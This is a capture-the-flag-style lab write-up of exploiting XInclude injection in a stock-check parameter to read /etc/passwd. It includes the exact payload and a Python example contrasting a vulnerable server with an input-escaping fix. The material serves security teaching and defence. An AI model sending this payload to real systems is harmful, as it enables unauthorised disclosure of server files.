XInclude to Retrieve Files: Lab WriteUp
Introduction
In the realm of web security, understanding how to exploit and defend against XML-related vulnerabilities is crucial. Recently, I delved into a PortSwigger lab that focused on exploiting XInclude to retrieve files from a server. This write-up documents my approach, findings, and the steps taken to uncover and exploit the vulnerability.
Understanding the Lab Context
The lab presents a web application with a “Check stock” feature that embeds user input inside a server-side XML document. The goal is to manipulate this input to retrieve the contents of the /etc/passwd file, a file often targeted in security exercises to demonstrate the potential impact of file disclosure vulnerabilities.
At first glance, this might seem like a classic XML External Entity (XXE) attack. However, this scenario was slightly different; I didn’t have control over the entire XML document, which ruled out a direct XXE attack. Instead, the challenge was to use an XInclude statement to achieve the same outcome.
Reconnaissance and Initial Observations
Upon inspecting the application, I identified that the productId parameter in the /product/stock endpoint was likely vulnerable. Using Burp Suite, I began by sending a few test requests to see how the application handled different inputs. The HTTP request and response patterns suggested that the productId parameter was being processed as part of an XML document on the server.
The server’s response provided the usual stock check information, but I noticed that malformed or unexpected inputs led to different responses, hinting at how the XML parser handled these cases. This was my cue to explore further.
Crafting the XInclude Payload
Understanding that the productId parameter could be a vector for XML manipulation, I decided to use the XInclude payload from PayloadAllTheThings. XInclude allows XML documents to include data from external sources, making it a potential tool for retrieving files from the server.
The payload I designed aimed to include the contents of the /etc/passwd file:
<xi:include parse="text" href="file:///etc/passwd"/>
This XInclude statement was then injected into the productId parameter:
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
Executing the Payload
With the payload ready, I injected it into the productId parameter and submitted the request. The server's response was as anticipated: it included the contents of the /etc/passwd file. This confirmed that the XInclude injection was successful, and the lab was effectively completed.
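To show why the injection works and what the fix looks like, here is an added Python example (not from the lab or this write-up) that models the vulnerable server pattern beside a hardened one using the standard library's XInclude processor. The stand-in file (a temp file replacing /etc/passwd), the file_loader, and the function names are assumptions made for the example.

```python
import pathlib
import tempfile
import urllib.request
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import escape

# Constructed stand-in for /etc/passwd so the example runs offline.
SECRET_CONTENT = "root:x:0:0:root:/root:/bin/bash\n"
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as _f:
    _f.write(SECRET_CONTENT)
SECRET_URI = pathlib.Path(_f.name).as_uri()  # file:///... like the lab's href

# The write-up's payload, with the href pointed at the stand-in file.
PAYLOAD = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    f'<xi:include parse="text" href="{SECRET_URI}"/>'
    '</foo>'
)


def file_loader(href, parse, encoding=None):
    """Hypothetical loader standing in for a server that resolves file://
    hrefs (the stdlib default_loader only opens plain paths)."""
    with urllib.request.urlopen(href) as resp:
        data = resp.read()
    if parse == "text":
        return data.decode(encoding or "utf-8")
    return ET.fromstring(data)


def _process(document: str) -> str:
    """Parse the server-side document, run XInclude, return productId's text."""
    doc = ET.fromstring(document)
    ElementInclude.include(doc, loader=file_loader)
    return "".join(doc.find("productId").itertext())


def vulnerable_stock_check(product_id: str) -> str:
    # Raw parameter concatenated into the XML: an <xi:include> in the input
    # becomes a real element and the loader pulls the target file in.
    return _process(f"<stockCheck><productId>{product_id}</productId></stockCheck>")


def hardened_stock_check(product_id: str) -> str:
    # Escaping turns '<' into '&lt;', so the payload is inert character data.
    # Stronger still: never run ElementInclude.include on untrusted documents.
    return _process(f"<stockCheck><productId>{escape(product_id)}</productId></stockCheck>")
```

Running vulnerable_stock_check(PAYLOAD) returns the stand-in file's contents, while hardened_stock_check(PAYLOAD) returns the payload string itself, untouched.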
Reflections and Takeaways
This exercise underscores the importance of secure XML processing in web applications. Features like XInclude, while useful, can be misused if not properly secured. In real-world scenarios, vulnerabilities like these could lead to significant data breaches or unauthorized access to sensitive files.
As I continue to explore the depths of web security, exercises like this reinforce the need for a robust understanding of different attack vectors and the importance of thorough security testing.
Conclusion
This lab provided a valuable opportunity to experiment with and understand the nuances of XInclude-based attacks. If you’re exploring web security, I highly recommend working through similar labs on PortSwigger’s platform. They offer a hands-on approach to learning that is both challenging and rewarding.